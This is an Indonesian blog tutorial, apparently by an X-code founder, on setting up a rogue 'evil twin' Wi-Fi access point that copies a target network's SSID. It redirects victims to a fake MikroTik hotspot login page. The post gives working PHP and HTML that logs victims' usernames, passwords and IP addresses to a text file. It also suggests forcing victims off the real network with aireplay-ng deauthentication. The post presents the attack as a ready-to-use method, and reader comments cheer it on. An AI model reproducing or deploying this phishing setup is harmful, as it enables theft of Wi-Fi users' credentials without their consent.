Pertama siapkan 3 hal di bawah ini
1. Router Mikrotik yang sudah diset router
2. Access Point
3. Laptop
Di Mikrotik router set seperti di bawah ini (Kondisi sudah diset router sebelumnya).
Lalu set seperti di bawah ini
Setelah itu klik OK
Setelah itu buat web proxy dengan set seperti di atas
Diasumsikan ip 192.168.1.9 adalah ip laptop kita yang diinstall xampp
DHCP Server bisa dari router mikrotik atau access point
Source code index.php untuk halaman login mikrotik
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>internet hotspot > login</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="expires" content="-1" />
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0;"/>
<style type="text/css">
body {color: #737373; font-size: 10px; font-family: verdana;}
textarea,input,select {
background-color: #FDFBFB;
border: 1px solid #BBBBBB;
padding: 2px;
margin: 1px;
font-size: 14px;
color: #808080;
}
a, a:link, a:visited, a:active { color: #AAAAAA; text-decoration: none; font-size: 10px; }
a:hover { border-bottom: 1px dotted #c1c1c1; color: #AAAAAA; }
img {border: none;}
td { font-size: 14px; color: #7A7A7A; }
</style>
</head>
<body>
<form name="sendin" action="$(link-login-only)" method="post">
</form>
<script type="text/javascript" src="/md5.js"></script>
<script type="text/javascript">
<!--
function doLogin() {
document.sendin.username.value = document.login.username.value;
document.sendin.password.value = hexMD5('$(chap-id)' + document.login.password.value + '$(chap-challenge)');
document.sendin.submit();
return false;
}
//-->
</script>
<div align="center">
<a href="$(link-login-only)?target=lv&dst=$(link-orig-esc)"></a></div>
<table width="100%" style="margin-top: 10%;">
<tr>
<td align="center" valign="middle">
<div class="notice" style="color: #c1c1c1; font-size: 9px">Please log on to use the internet hotspot service<br />
</div>
<br />
<table width="280" height="280" style="border: 1px solid #cccccc; padding: 0px;" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="bottom" height="175" colspan="2">
<form name="login" action="proses.php" method="post"
$(if chap-id) onSubmit="return doLogin()" $(endif)>
<input type="hidden" name="dst" value="$(link-orig)" />
<input type="hidden" name="popup" value="true" />
<table width="100" style="background-color: #ffffff">
<tr><td align="right">login</td>
<td><input style="width: 80px" name="username" type="text"/></td>
</tr>
<tr><td align="right">password</td>
<td><input style="width: 80px" name="password" type="password"/></td>
</tr>
<tr><td> </td>
<td><input type="submit" value="OK" /></td>
</tr>
</table>
</form>
</td>
</tr>
<tr><td align="center"><a href="http://www.mikrotik.com" target="_blank" style="border: none;"><img src="img/logobottom.png" alt="mikrotik" /></a></td></tr>
</table>
<br /><div style="color: #c1c1c1; font-size: 9px">Powered by MikroTik RouterOS</div>
<br />
<div style="color: #FF8080; font-size: 9px"></div>
</td>
</tr>
</table>
<script type="text/javascript">
<!--
document.login.username.focus();
//-->
</script>
</body>
</html>
Source code proses.php
<?php $file = "mikrotik.txt";
$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
$handle = fopen($file, 'a');
fwrite($handle, "-------------------------------------------------- ++");
fwrite($handle, "\n");
fwrite($handle, "Username login mikrotik: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password login mikrotik: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "-------------------------------------------------- ++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!--
window.location=\"http://192.168.1.9/login.php";
</script>";
?>
Setting access point yang asli
Di bawah ini diasumsikan setting access point palsu, nama SSID nya sama
Wireless Network Name nya XcodeTrainingData
Di atas diasumsikan adalah access point asli yang dijadikan target
Jika targetnya access point menggunakan WPA-PSK dan access point palsu kita disabled security (Tidak menggunakan WPA/WPA2 atau WEP.) maka akan muncul 2 access point dengan nama SSID sama, perbedaannya pada simbol tanda seru jika tidak ada keamanannya saat di lihat di Wireless Network Connection.
Di atas saat 2 AP dengan SSID sama tapi satunya di posisi disabled security tapi di satunya ada proteksi WPA/WPA2 Personal.
Jika sama-sama disabled security-nya maka SSID nya hanya satu yang terdeteksi, percobaan yang dilakukan saya PC yang terpasang wireless USB adapter, posisinya dekat dengan access point asli maka yang terkoneksi justru yang asli, bukan yang access point palsu dengan nama SSID sama.
Jika kondisinya korban terkoneksi dengan access point asli maka bisa dicoba memutus koneksi antara komputer korban dengan access point asli menggunakan aireplay-ng, caranya banyak di google, harapannya saat si korban tidak terkoneksi dan pindah tempat dan posisinya dekat dengan access point palsu dan terkoneksi dengan akses point palsu maka korban bisa masuk pada jebakan attacker.
Di sisi berbeda, saat laptop saya dekatkan dengan access point palsu dan melakukan koneksi ke XcodeTrainingData hasilnya seperti di bawah ini, yang artinya laptop saya terkoneksi dengan access palsu.
Saya dapat ip 192.168.1.104, terkoneksi ke access point palsu
Jika saya akses facebook.com
Hasilnya halaman login mikrotik palsu, kemudian dicoba login
Di komputer attacker hasilnya seperti di atas jika dibuka file mikrotik.txt
Penulis : Kurniawan (Founder X-code) – [email protected]
Mantap ilmunya
top markotop :v
Aku ingin mengetahui sandi WiFi vocer